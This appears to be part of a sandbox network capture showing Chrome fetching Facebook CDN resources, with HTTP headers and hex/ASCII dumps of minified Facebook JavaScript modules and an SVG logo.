                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: JeQBSwe7uoLa+eQ9UCgPuA==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 06:20:14 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: v9B3bot1h2/1XM2iuCoO46VbSDnmgPbqD23zezn8R6+DKFReIP6e/sABn0dIYH1gvPZnFImq9XRVpMmyFsddPg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:17 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 354326
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 54 68 69 73 7c 7c 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 73 65 6c 66 7c 7c 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 5f 5f 6c 69 73 74 65 6e
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/"use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listen
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 75 6d 65 72 61 62 6c 65 3d 64 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 3b 64 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 3b 22 76 61 6c 75 65 22 69 6e 20 64 26 26 28 64 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 64 2e 6b 65 79 2c 64 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 26 26 61 28 62 2e 70 72 6f 74 6f 74 79 70 65 2c 63 29 3b 64 26 26 61 28 62 2c 64 29 3b 72 65 74 75 72 6e 20 62 7d 7d 28 29 3b 62 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 61 2c 62 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 62 26 26 62 2e 70 72
                                                                                                                                                                                                                                Data Ascii: umerable=d.enumerable||!1;d.configurable=!0;"value"in d&&(d.writable=!0);Object.defineProperty(a,d.key,d)}}return function(b,c,d){c&&a(b.prototype,c);d&&a(b,d);return b}}();b.inheritsLoose=function(a,b){Object.assign(a,b);a.prototype=Object.create(b&&b.pr
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 74 68 3b 61 2b 2b 29 74 68 69 73 2e 24 32 5b 61 5d 2e 72 65 6d 6f 76 65 28 29 3b 74 68 69 73 2e 24 32 2e 6c 65 6e 67 74 68 3d 30 7d 2c 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 69 73 46 6f 72 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 7c 7c 68 28 30 2c 32 35 30 36 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 31 3d 3d 3d 61 7d 3b 72 65 74 75 72 6e 20 61 7d 28 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 61 2e 70 65 72
                                                                                                                                                                                                                                Data Ascii: th;a++)this.$2[a].remove();this.$2.length=0},this.$1=a,this.$2=b}var b=a.prototype;b.isForArbiterInstance=function(a){this.$1||h(0,2506);return this.$1===a};return a}();g["default"]=a}),98);__d("performance",[],(function(a,b,c,d,e,f){"use strict";b=a.per
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 28 62 29 7b 24 3d 62 2c 74 79 70 65 6f 66 20 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 21 75 61 26 26 28 75 61 3d 21 30 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 76 61 29 29 7d 76 61 72 20 78 61 3d 7b 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 3a 76 61 2c 73 65 74 75 70 3a 77 61 7d 3b 63 3d 7b 70 72 65 53 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 45 72 72 6f 72 21 3d 3d 21 30 29 26 26 77 2e 73 65 74 75 70 28 52 29 2c 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 55 6e 61 68 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 21 3d
                                                                                                                                                                                                                                Data Ascii: (b){$=b,typeof a.addEventListener==="function"&&!ua&&(ua=!0,a.addEventListener("unhandledrejection",va))}var xa={onunhandledrejection:va,setup:wa};c={preSetup:function(a){(a==null||a.ignoreOnError!==!0)&&w.setup(R),(a==null||a.ignoreOnUnahndledRejection!=
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1500INData Raw: 65 2f 69 6e 69 74 22 2c 74 74 69 3a 22 74 74 69 5f 62 69 67 70 69 70 65 22 2c 64 69 73 70 6c 61 79 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 64 69 73 70 6c 61 79 65 64 22 2c 6c 6f 61 64 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 6c 6f 61 64 65 64 22 7d 2c 73 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 5f 44 4f 5f 4e 4f 54 5f 55 53 45 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 3d 61 7d 2c 67 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 72 65 71 75 69 72 65 43 6f 6e 64 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28
                                                                                                                                                                                                                                Data Ascii: e/init",tti:"tti_bigpipe",displayed:"all_pagelets_displayed",loaded:"all_pagelets_loaded"},setCurrentInstance_DO_NOT_USE:function(a){g=a},getCurrentInstance:function(){return g}};e.exports=a}),null);__d("requireCond",[],(function(a,b,c,d,e,f){function a(
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC14884INData Raw: 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 69 66 28 28 68 7c 7c 28 68 3d 63 28 22 45 78 65 63 75 74 69 6f 6e 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 29 29 29 2e 69 73 49 6e 57 6f 72 6b 65 72 29 7b 61 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 61 28 62 29 3b 6a 28 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 67 2e 67 65 74 44 4f 4d 43 6f 6e 74 61 69 6e 65 72 4e 6f 64 65 3d 6a 3b 67 2e 62 61 74 63 68 44 4f 4d 49 6e 73 65 72 74 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 6f 62 6a 65 63 74 56 61 6c 75 65 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c
                                                                                                                                                                                                                                Data Ascii: ||document.body);return i}function a(a){if((h||(h=c("ExecutionEnvironment"))).isInWorker){a(null);return}var b=document.createDocumentFragment();a(b);j().appendChild(b)}g.getDOMContainerNode=j;g.batchDOMInsert=a}),98);__d("objectValues",[],(function(a,b,
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 3b 74 68 69 73 2e 24 33 2e 73 65 74 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 61 64 64 56 65 63 74 6f 72 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 2c 64 3d 74 68 69 73 2e 24 33 2e 67 65 74 28 61 29 7c 7c 5b 5d 3b 64 2e 70 75 73 68 28 62 29 3b 63 2e 73 65 74 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 72 65 67 69 73 74 65 72 4f 6e 42 65 66 6f 72 65 53 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 34 2e 70 75 73 68 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 65 70 61 72 65 54 6f 53 65 6e 64 3d
                                                                                                                                                                                                                                Data Ascii: s.$3=this.$3||new Map();this.$3.set(a,b);return this};b.addVectorElement=function(a,b){var c=this.$3=this.$3||new Map(),d=this.$3.get(a)||[];d.push(b);c.set(a,d);return this};b.registerOnBeforeSend=function(a){this.$4.push(a);return this};b.prepareToSend=
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 20 6e 65 77 20 45 72 72 6f 72 28 63 28 22 65 72 72 22 29 28 61 2e 6d 65 73 73 61 67 65 29 29 7d 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 62 2e 74 72 79 50 61 72 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 28 69 7c 7c 28 69 3d 64 28 22 55 52 49 53 63 68 65 6d 65 73 22 29 29 29 2e 4f 70 74 69 6f 6e 73 2e 49 4e 43 4c 55 44 45 5f 44 45 46 41 55 4c 54 53 29 3b 65 3d 6e 65 77 20 62 28 6e 75 6c 6c 2c 63 2c 65 2c 66 29 3b 72 65 74 75 72 6e 20 6a 28 65 2c 61 2c 21 31 2c 63 29 3f 65 3a 6e 75 6c 6c 7d 3b 62 2e 69 73 56 61 6c 69 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f
                                                                                                                                                                                                                                Data Ascii: new Error(c("err")(a.message))}}a=function(a){babelHelpers.inheritsLoose(b,a);b.tryParse=function(a,c,e,f){e===void 0&&(e=(i||(i=d("URISchemes"))).Options.INCLUDE_DEFAULTS);e=new b(null,c,e,f);return j(e,a,!1,c)?e:null};b.isValid=function(a,c,e,f){e===vo
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 4d 6f 64 75 6c 65 73 28 5b 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 41 73 52 65 66 28 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 22 70 72 65 6c 6f 61 64 3a 20 22 2b 63 29 7d 29 7d 3b 65 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3d 3d 3d 61 7c 7c 74 68 69 73 2e 24 31 3d 3d 61 2e 24 31 7d 3b 65 2e 67 65 74 4d 6f 64 75 6c 65 49 66 52 65 71 75 69 72 65 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 4a 53 52 65 73 6f 75 72 63 65 45 76 65 6e 74 73 22 29 2e 6e 6f 74 69 66 79 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 2c 22 41 43 43 45 53 53 45 44 22 29 3b 72 65 74 75 72 6e 20 63 28 22 69 66 52 65 71 75 69 72 65 61 62 6c 65
                                                                                                                                                                                                                                Data Ascii: unction(a){return a.loadModules([b.getModuleIdAsRef()],function(){},"preload: "+c)})};e.equals=function(a){return this===a||this.$1==a.$1};e.getModuleIfRequireable=function(){d("JSResourceEvents").notify(this.$1,this.$2,"ACCESSED");return c("ifRequireable


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.2.449771157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC608OUTGET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC1903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 7NlAIdLIU8O43rggO6FzAA==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 23:35:38 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: yPMhPUpxHXGWyPZ8Bm/96y8BvPHTvQNuRGtxFKVQ2eB+rP4+zm1fBc/X/ZpKsaQm6+lTwP6wgXZppDnUmyfqxg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:18 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 2549
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC1INData Raw: 3c
                                                                                                                                                                                                                                Data Ascii: <
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC2548INData Raw: 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 39 30 22 20 68 65 69 67 68 74 3d 22 33 36 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 39 30 20 33 36 30 22 3e 0a 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 38 36 36 46 46 22 20 64 3d 22 4d 38 38 31 2e 35 38 33 20 32 35 37 2e 38 39 37 68 32 39 2e 34 38 76 2d 34 37 2e 36 39 36 6c 34 31 2e 31 33 37 20 34 37 2e 36 39 36 68 33 36 2e 30 37 32 6c 2d 34 37 2e 38 39 2d 35 34 2e 39 36 39 20 34 30 2e 39 30 39 2d 34 37 2e 36 36 33 68 2d 33 32 2e 38 32 35 6c 2d 33 37 2e 34 30 33 20 34 33 2e 39 33 76 2d 39 36 2e 39 38 32 6c 2d 32 39 2e 34 38 20 33 2e 38 36 34 76 31 35 31 2e 38
                                                                                                                                                                                                                                Data Ascii: svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360"> <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.2.449772157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC581OUTGET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 8rx6czt+CAsqvWjnRr01qQ==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 18:36:38 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: ID41J++cu6/7GjofaLINA3bU1pMzB7jL/PvMk2d9xgh8eiLjktB2oFv1voZhTJp/ZFN7OQl66Bdr5cD1FAX46g==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:18 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 49300
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 2c 5b 22 41 72 62 69 74 65 72 22 2c 22 67 75 69 64 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 61 72 62 69 74 65 72 24 22 2b 63 28 22 67 75 69 64 22 29 28 29 2c 69 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 61 3d 7b 5f 67 65 74 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 74 68 69 73 2c 68 29 3f 74 68 69 73 5b 68 5d 3a 74 68 69 73 5b 68 5d 3d 6e 65 77 28 63 28 22 41 72 62 69 74 65 72 22 29 29 28 29 7d 2c 69 6e 66 6f 72 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC16384INData Raw: 34 37 2c 63 2c 74 79 70 65 6f 66 20 63 29 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 31 3f 5b 69 2c 63 2c 22 2a 22 5d 3a 5b 63 2c 22 2a 22 5d 7d 2c 67 65 74 47 65 6e 64 65 72 56 61 72 69 61 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 62 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 42 49 54 4d 41 53 4b 5f 47 45 4e 44 45 52 7c 7c 67 28 30 2c 31 31 36 34 38 2c 61 2c 74 79 70 65 6f 66 20 61 29 3b 72 65 74 75 72 6e 5b 61 2c 22 2a 22 5d 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 49 6d 70 6c 22
